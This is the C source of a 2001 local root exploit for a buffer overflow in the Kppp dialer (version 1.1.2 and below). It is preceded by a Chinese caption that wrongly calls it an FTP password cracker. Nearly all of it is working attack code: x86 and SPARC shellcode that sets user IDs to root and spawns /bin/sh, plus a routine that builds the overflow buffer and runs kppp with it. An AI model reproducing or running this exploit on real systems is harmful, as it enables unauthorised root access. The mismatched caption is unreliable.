kppp.c

一个FTP密码破解程序的源代码

/*
 * exploit.c Linux/Intel Kppp 1.1.2 and below
 * Re-Copyright (C) 2001 Doom <doom@sekurity.net>
 *                            <smashstack@hushmail.com)
 *
 * Null Byte Security <http://nbs.extremenetworking.net>
 * Bugtraq ID : 
 * Credit     : TDP, Michel Kaempf, RaiSe
 * Tested     : x86 Redhat 6.2
 * Notes      : This may need a little tweaking, hehe ;)
 *  
 * Description: There exists a buffer overflow in Kppp
 * probably because of a strcpy call. Also, I feel it's
 * safe to release this exploit now, but some distros
 * are still including including 1.1.2 in their source.
 *
 * Greets: Bi0cide, Natas, BrainStorm, Xchgleip, Z,
 * Fuqrag, Piffy, Bios Disk, B0ob, Qitest1, Mixter,
 * Ghost Blood, K2, Ontogenesis, Char, Mud, Medium,
 * Hackers Lab, Electronic Souls, Packet Storm, Security 
 * Focus, #!ElectronicSouls, sekurity.net, and everyone else.
*/

#include <stdio.h>
#include <stdlib.h>

#define  BUFFER          247
#define  OFFSET            1

#if defined(__i386__) && defined(__linux__)

char shellcode[] =
    "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
    "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

unsigned long get_sp(void) 
{
    __asm__("movl %esp,%eax");
}

/*
 * small setresuid 0,0,0 execve() of /bin/sh (without exit())
 *__asm__("
 *       subl %ebx, %ebx
 *       subl %ecx, %ecx
 *       subl %edx, %edx
 *       movb $0xa4, %al
 *       int $0x80
 *       xorl  %edx,%edx
 *       pushl %edx
 *       pushl $0x68732f6e
 *       pushl $0x69622f2f
 *       movl  %esp,%ebx
 *       pushl %edx
 *       pushl %ebx
 *       movl  %esp,%ecx
 *       leal  0xb(%edx),%eax
 *       int   $0x80
 * ");
*/

#elif defined(__sparc__) && defined(__linux__)

char shellcode[] =
    "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10"
    "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10"
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
    "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
    "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10";

unsigned long get_sp(void) 
{
    __asm__("or %sp, %sp, %i0");
}

#endif

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=OFFSET, bsize=BUFFER;
    int i;

    if (!(buff = malloc(bsize)))
    {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    printf("\nLocal Linux Kppp Exploit by Doom\n");
    printf("Use:$ ./kppp <buffersize> <offset>\n");

    addr = get_sp() - offset;

    printf("\nReturn Address : 0x%x", addr);

    if(argc > 1) bsize  = atoi(argv[1]);
    if(argc > 2) offset = atoi(argv[2]);

    printf("\nBuffer Size    : %d\n", bsize);
    printf("Offset         : %d\n", offset);

    ptr = buff;
    addr_ptr = (long *) ptr;

    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    for (i = 0; i < bsize; i += 4 )
    {
        buff[i  ] = ( addr & 0x00ff0000 ) >> 16;
        buff[i+1] = ( addr & 0xff000000 ) >> 24;
        buff[i+2] = addr & 0x000000ff;
        buff[i+3] = ( addr & 0x0000ff00 ) >> 8;
    }

    buff[bsize - 1] = '\0';

    execle("/usr/local/kde/bin/kppp", "kppp", "-c", buff, 0);
}